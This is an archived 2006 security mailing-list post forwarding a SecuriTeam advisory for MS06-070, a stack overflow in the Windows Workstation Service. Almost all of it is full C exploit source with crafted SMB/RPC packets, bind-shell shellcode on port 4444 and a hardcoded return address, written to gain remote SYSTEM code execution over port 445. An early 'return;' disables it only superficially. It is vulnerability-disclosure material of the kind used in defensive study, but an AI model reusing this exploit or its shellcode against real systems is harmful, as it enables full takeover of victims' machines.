Security-Alerts mailing list archive (security-alerts@yandex-team.ru)
[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
[security-alerts] FW: [NT] Microsoft Windows Wkssvc NetrJoinDomain2 Stack Overflow (MS06-070, Exploit)
> -----Original Message-----
> From: SecuriTeam [mailto:support@xxxxxxxxxxxxxx]
> Sent: Thursday, November 16, 2006 3:44 PM
> To: html-list@xxxxxxxxxxxxxx
> Subject: [NT] Microsoft Windows Wkssvc NetrJoinDomain2 Stack
> Overflow (MS06-070, Exploit)
>
> The following security advisory is sent to the securiteam
> mailing list, and can be found at the SecuriTeam web site:
>
>
> - - promotion
>
> The SecuriTeam alerts list - Free, Accurate, Independent.
>
> Get your security news from a reliable source.
>
>
>
> - - - - - - - - -
>
>
>
> Microsoft Windows Wkssvc NetrJoinDomain2 Stack Overflow
> (MS06-070, Exploit)
>
>
>
> A flaw exists in a default Windows component called the
> "Workstation Service" that when exploited allows for remote
> code execution in SYSTEM context, allowing an attacker to
> take complete control of affected systems.
>
>
> Exploit:
> /*************************************************************
> **************
>
> Microsoft Windows Wkssvc NetrJoinDomain2 Stack
> Overflow(MS06-070) Exploit
>
> by cocoruder(frankruder_at_hotmail.com),2006.11.15
> page:
>
> successfully test on Windows 2000 Server SP4(chinese)
>
> usage:
> ms06070 targetip DomainName
>
> notice:
> Make sure the DomainName is valid and live,more informations see
> ,
> cocoruder just research the vulnerability and give the
> exploit for Win2000.
> **************************************************************
> **************/
>
>
> #include <stdio.h>
> #include <windows.h>
> #include <winsock.h>
> #include <tchar.h>
>
>
> unsigned char SmbNeg[] =
> "\x00\x00\x00\x2f\xff\x53\x4d\x42\x72\x00"
> "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
> "\x00\x00\x00\x00\x88\x05\x00\x00\x00\x00\x00\x0c\x00\x02\x4e\x54"
> "\x20\x4c\x4d\x20\x30\x2e\x31\x32\x00";
>
>
> unsigned char Session_Setup_AndX_Request[]=
> "\x00\x00\x00\x48\xff\x53\x4d\x42\x73\x00"
> "\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
> "\x00\x00\xff\xff\x88\x05\x00\x00\x00\x00\x0d\xff\x00\x00\x00\xff"
> "\xff\x02\x00\x88\x05\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
> "\x00\x01\x00\x00\x00\x0b\x00\x00\x00\x6e\x74\x00\x70\x79\x73\x6d"
> "\x62\x00";
>
>
> unsigned char TreeConnect_AndX_Request[]=
> "\x00\x00\x00\x58\xff\x53\x4d\x42\x75\x00"
> "\x00\x00\x00\x18\x07\xc8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
> "\x00\x00\x00\x00\xff\xfe\x00\x08\x00\x03\x04\xff\x00\x58\x00\x08"
> "\x00\x01\x00\x2d\x00\x00\x5c\x00\x5c\x00\x31\x00\x37\x00\x32\x00"
> "\x2e\x00\x32\x00\x32\x00\x2e\x00\x35\x00\x2e\x00\x34\x00\x36\x00"
> "\x5c\x00\x49\x00\x50\x00\x43\x00\x24\x00\x00\x00\x3f\x3f\x3f\x3f"
> "\x3f\x00";
>
>
> unsigned char NTCreate_AndX_Request[]=
> "\x00\x00\x00\x64\xff\x53\x4d\x42\xa2\x00"
> "\x00\x00\x00\x18\x07\xc8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
> "\x00\x00\x00\x08\x04\x0c\x00\x08\x00\x01\x18\xff\x00\xde\xde\x00"
> "\x0e\x00\x16\x00\x00\x00\x00\x00\x00\x00\x9f\x01\x02\x00\x00\x00"
> "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00\x01\x00"
> "\x00\x00\x40\x00\x40\x00\x02\x00\x00\x00\x01\x11\x00\x00\x5c\x00"
> "\x77\x00\x6b\x00\x73\x00\x73\x00\x76\x00\x63\x00\x00\x00";
>
>
> unsigned char Rpc_Bind_Wkssvc[]=
> "\x00\x00\x00\x92\xff\x53\x4d\x42\x25\x00"
> "\x00\x00\x00\x18\x01\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
> "\x00\x00\x01\x08\xf0\x0b\x03\x08\xf7\x4c\x10\x00\x00\x48\x00\x00"
> "\x04\xe0\xff\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x4a"
> "\x00\x48\x00\x4a\x00\x02\x00\x26\x00\x01\x40\x4f\x00\x5c\x50\x49"
> "\x50\x45\x5c\x00\x05\x00\x0b\x03\x10\x00\x00\x00\x48\x00\x00\x00"
> "\x00\x00\x00\x00\xd0\x16\xd0\x16\x00\x00\x00\x00\x01\x00\x00\x00"
> "\x00\x00\x01\x00\x98\xd0\xff\x6b\x12\xa1\x10\x36\x98\x33\x46\xc3"
> "\xf8\x7e\x34\x5a\x01\x00\x00\x00\x04\x5d\x88\x8a\xeb\x1c\xc9\x11"
> "\x9f\xe8\x08\x00\x2b\x10\x48\x60\x02\x00\x00\x00";
>
>
> unsigned char Rpc_NetrJoinDomain2_Header[]=
> "\x00\x00\x00\xa8\xff\x53\x4d\x42\x25\x00"
> "\x00\x00\x00\x18\x07\xc8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
> "\x00\x00\x00\x08\x6c\x07\x00\x08\xc0\x01\x10\x00\x00\x54\x00\x00"
> "\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x54"
> "\x00\x54\x00\x54\x00\x02\x00\x26\x00\x00\x40\x65\x00\x00\x5c\x00"
> "\x50\x00\x49\x00\x50\x00\x45\x00\x5c\x00\x00\x00\x00\x00\x05\x00"
> "\x00\x03\x10\x00\x00\x00\x54\x00\x00\x00\x01\x00\x00\x00\x3c\x00"
> "\x00\x00\x00\x00"
> "\x16\x00" //opnum,NetrJoinDomain2
> "\x30\x2a\x42\x00"
> "\x0e\x00\x00\x00"
> "\x00\x00\x00\x00"
> "\x0e\x00\x00\x00"
> "\x5c\x00\x5c\x00\x31\x00\x37\x00\x32\x00"
> "\x2e\x00\x32\x00\x32\x00\x2e\x00\x35\x00\x2e\x00\x34\x00\x31\x00"
> "\x00\x00"
> "\x10\x01\x00\x00"
> "\x00\x00\x00\x00"
> "\x10\x01\x00\x00";
>
>
> unsigned char Rpc_NetrJoinDomain2_End[]=
> "\x00\x00\x00\x00"
> "\x00\x00\x00\x00"
> "\x00\x00\x00\x00"
> "\x01\x00\x00\x00";
>
>
> unsigned char *lpDomainName=NULL;
> DWORD dwDomainNameLen=0;
>
>
>
> /* win32_bind - EXITFUNC=seh LPORT=4444 Size=344
> Encoder=PexFnstenvSub
> */
> unsigned char shellcode[] =
> "\x2b\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x6e"
> "\xd2\x50\xd3\x83\xeb\xfc\xe2\xf4\x92\xb8\xbb\x9e\x86\x2b\xaf\x2c"
> "\x91\xb2\xdb\xbf\x4a\xf6\xdb\x96\x52\x59\x2c\xd6\x16\xd3\xbf\x58"
> "\x21\xca\xdb\x8c\x4e\xd3\xbb\x9a\xe5\xe6\xdb\xd2\x80\xe3\x90\x4a"
> "\xc2\x56\x90\xa7\x69\x13\x9a\xde\x6f\x10\xbb\x27\x55\x86\x74\xfb"
> "\x1b\x37\xdb\x8c\x4a\xd3\xbb\xb5\xe5\xde\x1b\x58\x31\xce\x51\x38"
> "\x6d\xfe\xdb\x5a\x02\xf6\x4c\xb2\xad\xe3\x8b\xb7\xe5\x91\x60\x58"
> "\x2e\xde\xdb\xa3\x72\x7f\xdb\x93\x66\x8c\x38\x5d\x20\xdc\xbc\x83"
> "\x91\x04\x36\x80\x08\xba\x63\xe1\x06\xa5\x23\xe1\x31\x86\xaf\x03"
> "\x06\x19\xbd\x2f\x55\x82\xaf\x05\x31\x5b\xb5\xb5\xef\x3f\x58\xd1"
> "\x3b\xb8\x52\x2c\xbe\xba\x89\xda\x9b\x7f\x07\x2c\xb8\x81\x03\x80"
> "\x3d\x81\x13\x80\x2d\x81\xaf\x03\x08\xba\x41\x8f\x08\x81\xd9\x32"
> "\xfb\xba\xf4\xc9\x1e\x15\x07\x2c\xb8\xb8\x40\x82\x3b\x2d\x80\xbb"
> "\xca\x7f\x7e\x3a\x39\x2d\x86\x80\x3b\x2d\x80\xbb\x8b\x9b\xd6\x9a"
> "\x39\x2d\x86\x83\x3a\x86\x05\x2c\xbe\x41\x38\x34\x17\x14\x29\x84"
> "\x91\x04\x05\x2c\xbe\xb4\x3a\xb7\x08\xba\x33\xbe\xe7\x37\x3a\x83"
> "\x37\xfb\x9c\x5a\x89\xb8\x14\x5a\x8c\xe3\x90\x20\xc4\x2c\x12\xfe"
> "\x90\x90\x7c\x40\xe3\xa8\x68\x78\xc5\x79\x38\xa1\x90\x61\x46\x2c"
> "\x1b\x96\xaf\x05\x35\x85\x02\x82\x3f\x83\x3a\xd2\x3f\x83\x05\x82"
> "\x91\x02\x38\x7e\xb7\xd7\x9e\x80\x91\x04\x3a\x2c\x91\xe5\xaf\x03"
> "\xe5\x85\xac\x50\xaa\xb6\xaf\x05\x3c\x2d\x80\xbb\x9e\x58\x54\x8c"
> "\x3d\x2d\x86\x2c\xbe\xd2\x50\xd3";
>
>
> DWORD fill_len_1 =0x84c; //fill data
> DWORD fill_len_2 =0x1000; //fill rubbish data
> DWORD addr_jmp_ebx=0x77f81573; //jmp ebx address,in ntdll.dll
> unsigned char code_jmp8[]= //jmp 8
> "\xEB\x06\x90\x90";
>
> unsigned char *Rpc_NetrJoinDomain2=NULL;
> DWORD dwRpc_NetrJoinDomain2=0;
>
>
> unsigned char recvbuff[2048];
>
>
> void showinfo(void)
> {
> printf("Microsoft Windows Wkssvc NetrJoinDomain2 Stack
> Overflow(MS06-070)
> Exploit\n");
> printf("by cocoruder(frankruder_at_hotmail.com),2006.10.15\n");
> printf("page:;);
> printf("successfully test on Windows 2000 Server SP4(chinese)\n\n");
>
> printf("usage:\n");
> printf("ms06070 targetip DomainName\n\n");
>
> printf("notice:\n");
> printf("Make sure the DomainName is valid and live,more informations
> see\n");
>
> printf("
> 0061114.html,\n");
>
> printf("cocoruder just research the vulnerability and give
> the exploit for
> Win2000.\n\n\n");
>
> }
>
> void neg ( int s )
> {
> char response[1024];
>
> memset(response,0,sizeof(response));
>
> send(s,(char *)SmbNeg,sizeof(SmbNeg)-1,0);
> }
>
>
>
> void MakeAttackPacket(char *lpDomainNameStr)
> {
> DWORD j,len,b_flag;
>
>
>
> dwDomainNameLen=(strlen(lpDomainNameStr)+2)*2;
> lpDomainName=(unsigned char *)malloc(dwDomainNameLen);
>
> memset(lpDomainName,0,dwDomainNameLen);
>
> MultiByteToWideChar(CP_ACP,0,lpDomainNameStr,-1,(LPWSTR)lpDoma
> inName,dwDomainNameLen);
>
> *(unsigned char *)(lpDomainName+dwDomainNameLen-2)=0x5C;
> *(unsigned char *)(lpDomainName+dwDomainNameLen-4)=0x5C;
>
> len=dwDomainNameLen+ //DomainName
> fill_len_1-3*2+ //fill_len_1
> 4+ //jmp 8
> 4+ //addr jmp ebx
> sizeof(shellcode)-1+ //shellcode
> fill_len_2+ //fill_len_2
> 2; //0x0000
>
> b_flag=0;
> if (len%2==1)
> {
> len++;
> b_flag=1;
> }
>
>
> dwRpc_NetrJoinDomain2=sizeof(Rpc_NetrJoinDomain2_Header)-1+
> len+
> sizeof(Rpc_NetrJoinDomain2_End)-1; //end
>
>
> //malloc
> Rpc_NetrJoinDomain2=(unsigned char *)malloc(dwRpc_NetrJoinDomain2);
> if (Rpc_NetrJoinDomain2==NULL)
> {
> printf("malloc error!\n");
> return;
> }
>
> //fill nop
> memset(Rpc_NetrJoinDomain2,0x90,dwRpc_NetrJoinDomain2);
>
>
> j=sizeof(Rpc_NetrJoinDomain2_Header)-1;
>
> //update para1 length
> *(DWORD *)(Rpc_NetrJoinDomain2_Header+j-0x0c)=len/2;
> *(DWORD *)(Rpc_NetrJoinDomain2_Header+j-0x04)=len/2;
>
>
> //copy header
>
> memcpy(Rpc_NetrJoinDomain2,Rpc_NetrJoinDomain2_Header,sizeof(R
> pc_NetrJoinDomain2_Header)-1);
>
> j=sizeof(Rpc_NetrJoinDomain2_Header)-1;
>
> //copy DomainName
> memcpy(Rpc_NetrJoinDomain2+j,lpDomainName,dwDomainNameLen);
> j=j+dwDomainNameLen;
>
> //calculate offset
> j=j+fill_len_1-3*2;
>
> //jmp 8
> memcpy(Rpc_NetrJoinDomain2+j,code_jmp8,sizeof(code_jmp8)-1);
> j=j+4;
>
> //jmp ebx address
> *(DWORD *)(Rpc_NetrJoinDomain2+j)=addr_jmp_ebx;
> j=j+4;
>
> //copy shellcode
> memcpy(Rpc_NetrJoinDomain2+j,shellcode,sizeof(shellcode)-1);
> j=j+sizeof(shellcode)-1;
>
> //fill data
> memset(Rpc_NetrJoinDomain2+j,0x41,fill_len_2);
> j=j+fill_len_2;
>
> //0x0000(NULL)
> if (b_flag==0)
> {
> Rpc_NetrJoinDomain2[j]=0x00;
> Rpc_NetrJoinDomain2[j+1]=0x00;
> j=j+2;
> }
> else if (b_flag==1)
> {
> Rpc_NetrJoinDomain2[j]=0x00;
> Rpc_NetrJoinDomain2[j+1]=0x00;
> Rpc_NetrJoinDomain2[j+2]=0x00;
> j=j+3;
> }
>
>
> //copy other parameter
>
> memcpy(Rpc_NetrJoinDomain2+j,Rpc_NetrJoinDomain2_End,sizeof(Rp
> c_NetrJoinDomain2_End)-1);
>
> j=j+sizeof(Rpc_NetrJoinDomain2_End)-1;
>
>
> }
>
>
>
> void main(int argc,char **argv)
> {
> WSADATA ws;
> struct sockaddr_in server;
> SOCKET sock;
> DWORD ret;
> WORD userid,treeid,fid;
>
>
> showinfo();
>
> return;
>
> WSAStartup(MAKEWORD(2,2),&ws);
>
>
>
>
> sock = socket(AF_INET,SOCK_STREAM,0);
> if(sock<=0)
> {
> return;
> }
>
> server.sin_family = AF_INET;
> server.sin_addr.s_addr = inet_addr(argv[1]);
> server.sin_port = htons((USHORT)445);
>
> printf("[+] Connecting %s\n",argv[1]);
>
> ret=connect(sock,(struct sockaddr *)&server,sizeof(server));
> if (ret==-1)
> {
> printf("connect error!\n");
> return;
> }
>
>
> neg(sock);
>
> recv(sock,(char *)recvbuff,sizeof(recvbuff),0);
>
> ret=send(sock,(char
> *)Session_Setup_AndX_Request,sizeof(Session_Setup_AndX_Request)-1,0);
> if (ret<=0)
> {
> printf("send Session_Setup_AndX_Request error!\n");
> return;
> }
> recv(sock,(char *)recvbuff,sizeof(recvbuff),0);
>
> userid=*(WORD *)(recvbuff+0x20); //get userid
>
>
> memcpy(TreeConnect_AndX_Request+0x20,(char *)&userid,2);
> //update userid
>
>
> ret=send(sock,(char
> *)TreeConnect_AndX_Request,sizeof(TreeConnect_AndX_Request)-1,0);
> if (ret<=0)
> {
> printf("send TreeConnect_AndX_Request error!\n");
> return;
> }
> recv(sock,(char *)recvbuff,sizeof(recvbuff),0);
>
> treeid=*(WORD *)(recvbuff+0x1c); //get treeid
>
>
> //send NTCreate_AndX_Request
> memcpy(NTCreate_AndX_Request+0x20,(char *)&userid,2);
> //update userid
> memcpy(NTCreate_AndX_Request+0x1c,(char *)&treeid,2);
> //update treeid
>
>
> ret=send(sock,(char
> *)NTCreate_AndX_Request,sizeof(NTCreate_AndX_Request)-1,0);
> if (ret<=0)
> {
> printf("send NTCreate_AndX_Request error!\n");
> return;
> }
> recv(sock,(char *)recvbuff,sizeof(recvbuff),0);
>
>
> fid=*(WORD *)(recvbuff+0x2a); //get fid
>
>
> //rpc bind
>
> memcpy(Rpc_Bind_Wkssvc+0x20,(char *)&userid,2);
> memcpy(Rpc_Bind_Wkssvc+0x1c,(char *)&treeid,2);
> memcpy(Rpc_Bind_Wkssvc+0x43,(char *)&fid,2);
> *(DWORD *)Rpc_Bind_Wkssvc=htonl(sizeof(Rpc_Bind_Wkssvc)-1-4);
>
> ret=send(sock,(char *)Rpc_Bind_Wkssvc,sizeof(Rpc_Bind_Wkssvc)-1,0);
> if (ret<=0)
> {
> printf("send Rpc_Bind_Wkssvc error!\n");
> return;
> }
> recv(sock,(char *)recvbuff,sizeof(recvbuff),0);
>
>
> MakeAttackPacket((char *)argv[2]);
>
>
> memcpy(Rpc_NetrJoinDomain2+0x20,(char *)&userid,2);
> memcpy(Rpc_NetrJoinDomain2+0x1c,(char *)&treeid,2);
> memcpy(Rpc_NetrJoinDomain2+0x43,(char *)&fid,2);
> *(DWORD *)Rpc_NetrJoinDomain2=htonl(dwRpc_NetrJoinDomain2-4);
>
> *(WORD
> *)(Rpc_NetrJoinDomain2+0x27)=dwRpc_NetrJoinDomain2-0x58; //update
> Total Data Count
> *(WORD
> *)(Rpc_NetrJoinDomain2+0x3b)=dwRpc_NetrJoinDomain2-0x58; //update
> Data Count
> *(WORD
> *)(Rpc_NetrJoinDomain2+0x45)=dwRpc_NetrJoinDomain2-0x47; //update
> Byte Count
> *(WORD
> *)(Rpc_NetrJoinDomain2+0x60)=dwRpc_NetrJoinDomain2-0x58; //update
> Frag Length
>
> ret=send(sock,(char *)Rpc_NetrJoinDomain2,dwRpc_NetrJoinDomain2,0);
> if (ret<=0)
> {
> printf("send Rpc_NetrJoinDomain2 error!\n");
> return;
> }
>
> printf("[+] Send attack packet successfully.telnet
> %s:4444?\n",argv[1]);
>
> recv(sock,(char *)recvbuff,sizeof(recvbuff),0);
>
>
>
>
> closesocket(sock);
>
> }
>
>
> Additional Information:
> The information has been provided by: cocoruder
> <mailto:frankruder_at_hotmail.com> .
>
>
> ==============================================================
> ==================
>
>
>
>
>
> This bulletin is sent to members of the SecuriTeam mailing list.
> To unsubscribe from the list, send mail with an empty subject
> line and body to: html-list-unsubscribe@xxxxxxxxxxxxxx
> In order to subscribe to the mailing list and receive
> advisories in HTML format, simply forward this email to:
> html-list-subscribe@xxxxxxxxxxxxxx
>
>
>
> ==============================================================
> ==================
> ==============================================================
> ==================
>
> DISCLAIMER:
> The information in this bulletin is provided "AS IS" without
> warranty of any kind.
> In no event shall we be liable for any damages whatsoever
> including direct, indirect, incidental, consequential, loss
> of business profits or special damages.
>
>
>
>
>
>
|
